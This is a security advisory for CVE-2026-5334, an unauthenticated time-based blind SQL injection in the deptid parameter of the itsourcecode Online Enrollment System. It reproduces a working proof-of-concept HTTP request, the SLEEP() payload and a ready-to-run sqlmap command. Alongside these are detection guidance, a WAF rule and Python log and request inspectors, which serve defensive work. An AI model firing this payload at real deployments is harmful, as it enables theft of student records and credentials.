Introduction
An unauthenticated SQL injection in the itsourcecode Online Enrollment System allows remote attackers to extract database contents through a publicly documented, trivially reproducible attack against the enrollment edit function. With a public proof of concept already circulating and no vendor patch on the horizon, this is a vulnerability that demands immediate compensating controls from any organization running this software.
Itsourcecode is a platform that distributes free source code projects and programming tutorials for developers learning PHP, Java, Python, and other languages. The Online Student Enrollment System is one of their free PHP and MySQL projects. While not a commercial product with enterprise adoption, these types of open source educational projects frequently end up deployed in small institutional environments, making vulnerabilities in them relevant to the broader web application security landscape.
Technical Information
CVE-2026-5334 is a SQL injection vulnerability rooted in the complete absence of input sanitization on the deptid POST parameter within the enrollment module of the Online Enrollment System 1.0. The weakness is classified under both CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) and CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component). The CVSS v3.1 base score is 7.3, placing it in the High severity range, with impact across confidentiality, integrity, and availability.
Vulnerable Endpoints and Parameters
The attack surface involves two HTTP paths that work together. The enrollment edit form is rendered by the following URL:
/sms/enrollment/index.php?view=edit&id=3
When the form is submitted, the data is sent via POST to:
/sms/enrollment/controller.php?action=edit
The POST body includes four parameters: deptid, deptname, deptdesc, and save. The deptid parameter value is passed unsanitized into a backend SQL query, creating the injection point. No authentication or session validation is required to reach this endpoint.
Injection Technique
The disclosed attack uses time-based blind SQL injection, a technique where the attacker injects a SLEEP() function call into the query. If the injected SQL executes successfully, the database delays its response by the specified number of seconds. By observing whether the HTTP response is delayed, the attacker can infer boolean conditions about the database contents and extract data character by character.
The payload structure targets MySQL versions 5.0.12 and above:
deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX)&deptname=111&deptdesc=111&save=
This technique is stealthier than error-based or union-based injection because no data appears directly in the HTTP response body. However, it produces a distinctive pattern of delayed responses that is detectable through log analysis and database monitoring.
Systemic Codebase Weakness
This is not an isolated flaw. A sibling vulnerability, CVE-2026-4842, affects the identical deptid parameter in a different module at /sms/grades/index.php?view=edit&id=1. The recurrence of the same unsafe pattern across multiple endpoints strongly suggests the application lacks any centralized input validation or query parameterization, meaning additional undisclosed injection points may exist throughout the codebase.
Proof of Concept
A public proof of concept was disclosed on March 16, 2026, via a GitHub issue by the user yihaofuweng. VulDB confirmed the PoC under advisory VDB-354668.
The PoC provides a complete HTTP request that can be saved to a file (e.g., 1.txt) and fed directly to sqlmap:
POST /sms/enrollment/controller.php?action=edit HTTP/1.1
Host: 192.168.60.130
Content-Length: 40
Cache-Control: max-age=0
Origin: http://192.168.60.130
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.60.130/sms/enrollment/index.php?view=edit&id=3
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=9e304gniduc5qik7l8kks3bs21
Connection: keep-alive

deptid=3&deptname=111&deptdesc=111&save=
Exploitation is then as simple as:
sqlmap -r 1.txt --batch
The confirmed injection parameter and payload:
Parameter: deptid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX)&deptname=111&deptdesc=111&save=
No login or authorization is required to reach the vulnerable endpoint. Once sqlmap confirms the injection, an attacker can enumerate database names, table schemas, and extract sensitive data such as student records and credentials stored in the MySQL backend.
Detection Methods
No pre-published YARA, Sigma, or Snort rules specific to CVE-2026-5334 have been identified at the time of writing. However, multiple public sources provide actionable indicators that defenders can use to detect exploitation attempts.
Web Server Log Monitoring
The most immediately accessible detection point is web server access logs. Because time-based blind injection requires many sequential requests to extract data character by character, automated tooling like sqlmap generates a distinctive burst pattern. Defenders should look for:
- Clusters of POST requests to /sms/enrollment/controller.php?action=edit from the same source IP in rapid succession
- Correlation with the Referer header value http://<host>/sms/enrollment/index.php?view=edit&id=3, which appears in the disclosed PoC
- A high frequency, machine-like cadence of requests that differs from normal human interaction with the enrollment edit form
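The burst pattern described above can be checked with a sliding window over the access log. This is an added example, not part of the original advisory or the project; it assumes Apache combined log format, and the threshold, window size, host name and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

ENDPOINT = "/sms/enrollment/controller.php?action=edit"
POC_REFERER = "/sms/enrollment/index.php?view=edit&id=3"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)

def find_bursts(lines, threshold=5, window_s=10):
    """Map each source IP that sends >= threshold POSTs to ENDPOINT within
    window_s seconds to its peak count and whether the PoC Referer was seen.
    threshold and window_s are assumed starting values; tune them per site."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    seen_referer = defaultdict(bool)
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or m["path"] != ENDPOINT:
            continue
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        seen_referer[ip] |= m["referer"].endswith(POC_REFERER)
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_s:
            window.popleft()  # drop requests that fell out of the window
        if len(window) >= threshold:
            peak = max(len(window), flagged.get(ip, {}).get("peak", 0))
            flagged[ip] = {"peak": peak, "poc_referer": seen_referer[ip]}
    return flagged

# Constructed sample in Apache combined format (documentation IP ranges).
REF = "http://sms.example" + POC_REFERER
SAMPLE_LOG = [
    f'203.0.113.7 - - [16/Mar/2026:10:00:{sec:02d} +0000] "POST {ENDPOINT} HTTP/1.1" 200 512 "{REF}" "-"'
    for sec in range(8)      # eight POSTs in eight seconds: machine cadence
] + [
    f'198.51.100.20 - - [16/Mar/2026:10:0{minute}:12 +0000] "POST {ENDPOINT} HTTP/1.1" 302 0 "{REF}" "Mozilla/5.0"'
    for minute in (1, 6)     # two edits five minutes apart: human cadence
]

if __name__ == "__main__":
    for ip, info in find_bursts(SAMPLE_LOG).items():
        print(ip, info)
```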
SQL Injection Payload Indicators in Request Bodies
If your infrastructure supports POST body inspection (via WAF, reverse proxy, or application logging), alert on the presence of these SQL syntax fragments within parameters directed at the enrollment endpoints:
- SLEEP(: the core time delay function used for blind extraction
- SELECT ... FROM (SELECT: nested subquery patterns typical of injection payloads
- Standard SQL injection markers: single quotes ('), comment sequences (--, #), UNION SELECT, OR 1=1, and AND 1=1
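A body inspector for these indicators has to URL-decode each parameter before matching, otherwise an encoded copy of the same payload passes unnoticed. The sketch below is an added example, not code from the advisory or the project; it assumes deptid is a plain integer key and restricts the quote and comment markers to that field, since they occur in ordinary free text. The benign body is constructed.

```python
import re
from urllib.parse import parse_qsl

# Fragments listed above; matched case-insensitively after URL decoding.
INDICATORS = {
    "sleep_call": re.compile(r"\bSLEEP\s*\(", re.I),
    "nested_select": re.compile(r"\bSELECT\b.*\bFROM\s*\(\s*SELECT\b", re.I | re.S),
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "tautology": re.compile(r"\b(?:OR|AND)\s+1\s*=\s*1\b", re.I),
}
# Quotes and comment markers occur in ordinary free text, so they are only
# checked in identifier fields. Assumption: deptid is a plain integer key.
ID_PARAMS = {"deptid"}
ID_MARKERS = re.compile(r"'|--|#")

def inspect_body(body):
    """Return {param: [indicator, ...]} for a urlencoded POST body."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        found = [label for label, rx in INDICATORS.items() if rx.search(value)]
        if name in ID_PARAMS:
            if ID_MARKERS.search(value):
                found.append("quote_or_comment")
            if not value.strip().isdigit():
                found.append("non_numeric_id")
        if found:
            hits[name] = found
    return hits

# Body as published in the PoC, the same body URL-encoded, and a constructed
# benign edit whose description contains a quote and a '#'.
POC_BODY = "deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX)&deptname=111&deptdesc=111&save="
POC_ENCODED = ("deptid=3+AND+%28SELECT+2692+FROM+%28SELECT%28SLEEP%285%29%29%29WDuX%29"
               "&deptname=111&deptdesc=111&save=")
BENIGN_BODY = "deptid=3&deptname=Computing&deptdesc=Students%27+%231+choice&save="

if __name__ == "__main__":
    for body in (POC_BODY, POC_ENCODED, BENIGN_BODY):
        print(inspect_body(body))
```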
WAF Detection Rule
For organizations running ModSecurity or a compatible WAF, the following rule targets the specific vulnerable parameter. This rule was documented in analysis of the sibling vulnerability CVE-2026-4842, which exploits the identical deptid parameter in the same product:
SecRule ARGS:deptid "@detectSQLi" \
"id:1001,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection attempt detected in deptid parameter',\
log,\
auditlog"
This rule fires during phase 2 (request body analysis), which is critical since the injection is delivered via POST. The @detectSQLi operator leverages ModSecurity's built-in SQL injection detection logic against the specific deptid argument.
Database Level Detection
Monitoring MySQL query logs provides a deeper detection signal. Look for:
- Queries originating from the web application's database user that contain unexpected SLEEP() calls, BENCHMARK() functions, or nested SELECT subqueries
- Unusual UNION SELECT statements or queries returning information_schema tables, indicating database structure enumeration
- Abnormal query execution times: if queries to the enrollment tables suddenly start taking 5 or more seconds (matching the SLEEP(5) in the PoC), this is a strong behavioral indicator of active exploitation
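These database signals can be pulled from the MySQL slow query log. The parser below is an added example, not part of the original advisory; it assumes the standard slow-log entry layout with a low long_query_time. The account names smsapp and backup, the department table and the log entries are constructed.

```python
import re

USER = re.compile(r"^# User@Host: (?P<user>[^\[\s]+)\[", re.M)
QTIME = re.compile(r"^# Query_time: (?P<qt>\d+(?:\.\d+)?)", re.M)
DELAY = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
ENUM = re.compile(r"\binformation_schema\b|\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)

def flag_entries(log_text, app_user, min_seconds=5.0):
    """Return [(query_time, reasons, sql)] for suspicious entries run by app_user."""
    findings = []
    # Each slow-log entry is taken to start at its "# User@Host:" header line.
    for chunk in re.split(r"(?m)^(?=# User@Host: )", log_text):
        user, qt = USER.search(chunk), QTIME.search(chunk)
        if not user or not qt or user["user"] != app_user:
            continue  # preamble, or a query from another database account
        sql = " ".join(
            ln.strip() for ln in chunk.splitlines()
            if ln.strip() and not ln.startswith(("#", "SET timestamp="))
        )
        seconds = float(qt["qt"])
        reasons = [label for label, hit in (
            ("slow", seconds >= min_seconds),
            ("delay_function", DELAY.search(sql)),
            ("schema_enumeration", ENUM.search(sql)),
        ) if hit]
        if reasons:
            findings.append((seconds, reasons, sql))
    return findings

# Constructed slow-log excerpt; table and account names are hypothetical.
SAMPLE_SLOW_LOG = """\
# Time: 2026-03-16T10:00:05.120000Z
# User@Host: smsapp[smsapp] @ localhost []  Id:    41
# Query_time: 5.001203  Lock_time: 0.000000 Rows_sent: 0  Rows_examined: 0
SET timestamp=1773655205;
UPDATE department SET deptname='111' WHERE deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX);
# Time: 2026-03-16T10:00:09.400000Z
# User@Host: smsapp[smsapp] @ localhost []  Id:    42
# Query_time: 1.204511  Lock_time: 0.000100 Rows_sent: 12  Rows_examined: 12
SET timestamp=1773655209;
SELECT * FROM department ORDER BY deptname;
# Time: 2026-03-16T10:02:00.000000Z
# User@Host: backup[backup] @ localhost []  Id:    43
# Query_time: 12.300000  Lock_time: 0.000000 Rows_sent: 900  Rows_examined: 900
SET timestamp=1773655320;
SELECT * FROM department;
"""
```

Calling flag_entries(SAMPLE_SLOW_LOG, "smsapp") reports only the first entry; the slow backup query is skipped because it does not come from the web application's account.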
Error Response Correlation
A spike in HTTP 500 errors, SQL syntax errors, or ORM exceptions returned from /sms/enrollment/controller.php originating from the same source IP is a reliable early warning indicator that someone is probing for the vulnerability. Correlating web server error responses with the access patterns described above strengthens detection confidence.
MITRE ATT&CK Mapping
VulDB's CTI analysis maps this vulnerability to MITRE ATT&CK technique T1505 (Server Software Component) with CAPEC-108 (Command Line Injection). The file path /enrollment/index.php?view=edit&id=3 is listed as a verified Indicator of Attack at high confidence.
Affected Systems and Versions
- Product: itsourcecode Online Enrollment System
- Version: 1.0 (the only known version; no updates have been recorded on the project page)
- Technology stack: PHP and MySQL
- Vulnerable component: Parameter Handler in the enrollment edit module
- Vulnerable endpoints: /sms/enrollment/index.php?view=edit&id=3 (form rendering) and /sms/enrollment/controller.php?action=edit (form processing)
- Vulnerable parameter: deptid (POST)
Vendor Security History
The itsourcecode Online Enrollment System has multiple SQL injection vulnerabilities documented in its codebase. In addition to CVE-2026-5334, the sibling vulnerability CVE-2026-4842 affects the same deptid parameter in the grades module at /sms/grades/index.php?view=edit&id=1. The recurrence of the same vulnerability pattern across different modules indicates a systemic lack of secure coding practices throughout the application. The project page on itsourcecode.com shows zero updates, and the platform does not maintain a security advisory or disclosure process.
References
- CVE-2026-5334 Detail, National Vulnerability Database
- VulDB Advisory VDB-354668: itsourcecode Online Enrollment System Parameter index.php SQL Injection
- VulDB CTI Analysis for CVE-2026-5334
- VulDB Submission #781119
- GitHub PoC: itsourcecode Online Enrollment System V1.0 SQL Injection (yuji0903/silver-guide issue #15)
- RedPacket Security Advisory: CVE-2026-5334
- SentinelOne Vulnerability Database: CVE-2026-4842 (sibling vulnerability)
- Tenable CVE-2026-5334
- Tenable CVE-2026-4842
- Feedly CVE-2026-5334 Tracking
- itsourcecode.com
- itsourcecode Online Student Enrollment System Project Page



